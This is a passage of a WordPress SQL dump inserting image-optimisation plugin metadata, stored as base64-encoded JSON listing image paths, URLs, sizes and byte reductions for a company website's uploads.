mwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjkyLCJ0aW1lIjoxNDgzNTkyMTY4LCJpZCI6N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6Nzg0LCJ0aW1lIjoxNDgzNTkyMTcxLCJpZCI6N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTAwOCwidGltZSI6MTQ4MzU5MjE3NSwiaWQiOjd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjExOTAsInRpbWUiOjE0ODM1OTIxNzksImlkIjo3fV0='); 
INSERT INTO `wp_postmeta` VALUES (30467, 6, 'wpfc_optimisation_reduction', '4114'); 
INSERT INTO `wp_postmeta` VALUES (30468, 6, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLmpwZyIsIndpZHRoIjo0NTAsImhlaWdodCI6MzE4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsLmpwZyIsInJlZHVjdGlvbiI6NDEwNSwidGltZSI6MTQ4MzU5MjE4NywiaWQiOiI2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMzQweDMxOC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjMxOCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMzQweDMxOC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWwtMzQweDMxOC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTIxODksImlkIjo2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MjE5MSwiaWQiOjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkyMTkzLCJpZCI6Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWwtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTIxOTYsImlkIjo2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkyMTk4LCJpZCI6Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MjIwMCwiaWQiOjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWwtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTIyMDIsImlkIjo2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkyMjA0LCJpZCI6Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC00MDB4MzE4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC00MDB4MzE4LmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiMzE4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC00MDB4MzE4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MjIwNywiaWQiOjZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30469, 3188, 'wpfc_optimisation_reduction', '6708'); 
INSERT INTO `wp_postmeta` VALUES (30470, 3188, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvY2hlbW91cnMtbG9nby5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL2NoZW1vdXJzLWxvZ28ucG5nIiwid2lkdGgiOjM4NiwiaGVpZ2h0IjoxMjQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9jaGVtb3Vycy1sb2dvLnBuZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MjIxNCwiaWQiOiIzMTg4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9jaGVtb3Vycy1sb2dvLTM0MHgxMjQucG5nIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjoxMjQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvY2hlbW91cnMtbG9nby0zNDB4MTI0LnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvY2hlbW91cnMtbG9nby0zNDB4MTI0LnBuZyIsInJlZHVjdGlvbiI6MjU0OSwidGltZSI6MTQ4MzU5MjIxNywiaWQiOjMxODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvY2hlbW91cnMtbG9nby0yNTB4MTI0LnBuZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MTI0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL2NoZW1vdXJzLWxvZ28tMjUweDEyNC5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL2NoZW1vdXJzLWxvZ28tMjUweDEyNC5wbmciLCJyZWR1Y3Rpb24iOjE1ODcsInRpbWUiOjE0ODM1OTIyMjEsImlkIjozMTg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL2NoZW1vdXJzLWxvZ28tMjAweDEyNC5wbmciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjEyNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9jaGVtb3Vycy1sb2dvLTIwMHgxMjQucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9jaGVtb3Vycy1sb2dvLTIwMHgxMjQucG5nIiwicmVkdWN0aW9uIjoxMjA3LCJ0aW1lIjoxNDgzNTkyMjI0LCJpZCI6MzE4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9jaGVtb3Vycy1sb2dvLTIyNXgxMjQucG5nIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxMjQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvY2hlbW91cnMtbG9nby0yMjV4MTI0LnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvY2hlbW91cnMtbG9nby0yMjV4MTI0LnBuZyIsInJlZHVjdGlvbiI6MTM2NCwidGltZSI6MTQ4MzU5MjIyOCwiaWQiOjMxODh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30471, 2764, 'wpfc_optimisation_reduction', '61532'); 
INSERT INTO `wp_postmeta` VALUES (30472, 2764, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYWRsLWNvbXBhcmlzb24ucG5nIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hZGwtY29tcGFyaXNvbi5wbmciLCJ3aWR0aCI6NTU2LCJoZWlnaHQiOjI2NSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2FkbC1jb21wYXJpc29uLnBuZyIsInJlZHVjdGlvbiI6MzQwOCwidGltZSI6MTQ4MzU5MjIzNSwiaWQiOiIyNzY0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hZGwtY29tcGFyaXNvbi0zNDB4MjY1LnBuZyIsIndpZHRoIjozNDAsImhlaWdodCI6MjY1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2FkbC1jb21wYXJpc29uLTM0MHgyNjUucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9hZGwtY29tcGFyaXNvbi0zNDB4MjY1LnBuZyIsInJlZHVjdGlvbiI6Nzc5MSwidGltZSI6MTQ4MzU5MjIzOSwiaWQiOjI3NjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYWRsLWNvbXBhcmlzb24tMjUweDI1MC5wbmciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hZGwtY29tcGFyaXNvbi0yNTB4MjUwLnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvYWRsLWNvbXBhcmlzb24tMjUweDI1MC5wbmciLCJyZWR1Y3Rpb24iOjEzODgyLCJ0aW1lIjoxNDgzNTkyMjQzLCJpZCI6Mjc2NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hZGwtY29tcGFyaXNvbi0yMDB4MjAwLnBuZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2FkbC1jb21wYXJpc29uLTIwMHgyMDAucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9hZGwtY29tcGFyaXNvbi0yMDB4MjAwLnBuZyIsInJlZHVjdGlvbiI6MTAyNDcsInRpbWUiOjE0ODM1OTIyNDcsImlkIjoyNzY0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2FkbC1jb21wYXJpc29uLTIyNXgyMjUucG5nIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYWRsLWNvbXBhcmlzb24tMjI1eDIyNS5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2FkbC1jb21wYXJpc29uLTIyNXgyMjUucG5nIiwicmVkdWN0aW9uIjoxMjMzMSwidGltZSI6MTQ4MzU5MjI1MiwiaWQiOjI3NjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYWRsLWNvbXBhcmlzb24tNTEweDI2NS5wbmciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjI2NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hZGwtY29tcGFyaXNvbi01MTB4MjY1LnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvYWRsLWNvbXBhcmlzb24tNTEweDI2NS5wbmciLCJyZWR1Y3Rpb24iOjEzODczLCJ0aW1lIjoxNDgzNTkyMjU2LCJpZCI6Mjc2NH1d'); 
INSERT INTO `wp_postmeta` VALUES (30473, 1602, 'wpfc_optimisation_reduction', '20702'); 
INSERT INTO `wp_postmeta` VALUES (30474, 1602, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSW5pdGlhdGlvbl8tX3Bob3RvbHlzaXMucG5nIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Jbml0aWF0aW9uXy1fcGhvdG9seXNpcy5wbmciLCJ3aWR0aCI6MTAyNCwiaGVpZ2h0IjoxNDYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Jbml0aWF0aW9uXy1fcGhvdG9seXNpcy5wbmciLCJyZWR1Y3Rpb24iOjQyNywidGltZSI6MTQ4MzU5MjI2MywiaWQiOiIxNjAyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Jbml0aWF0aW9uXy1fcGhvdG9seXNpcy0zNDB4MTQ2LnBuZyIsIndpZHRoIjozNDAsImhlaWdodCI6MTQ2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTM0MHgxNDYucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Jbml0aWF0aW9uXy1fcGhvdG9seXNpcy0zNDB4MTQ2LnBuZyIsInJlZHVjdGlvbiI6OTkyLCJ0aW1lIjoxNDgzNTkyMjY2LCJpZCI6MTYwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Jbml0aWF0aW9uXy1f